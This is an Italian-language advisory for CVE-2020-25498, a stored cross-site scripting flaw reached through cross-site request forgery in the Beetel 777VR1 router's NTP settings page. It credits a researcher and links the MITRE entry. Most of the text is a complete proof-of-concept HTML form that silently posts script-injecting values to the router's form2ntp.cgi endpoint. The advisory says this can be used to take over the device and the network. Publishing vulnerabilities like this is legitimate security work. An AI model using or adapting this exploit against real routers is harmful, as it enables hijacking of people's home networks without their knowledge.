
Stored XSS tramite CSRF nel router Beetel 777VR1
È stato identificato che l'endpoint vulnerabile non ha una validazione lato server e manca di filtraggio lato client per qualsiasi iniezione di script malevolo. Un attaccante può utilizzare questa vulnerabilità per iniettare script malevolo nell'endpoint e lo script viene attivato ogni volta che un utente apre l'endpoint vulnerabile. L'attaccante può inviare un URL malevolo con payload di richiesta POST per eseguire XSS nel modulo admin tramite CSRF per prendere il controllo del dispositivo e, infine, della rete.
Ricercatore: Sayli Ambure (https://twitter.com/sayli_ambure)
Link MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
Codice HTML CSRF:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Parametro: Nome del server
Parametro: Parola chiave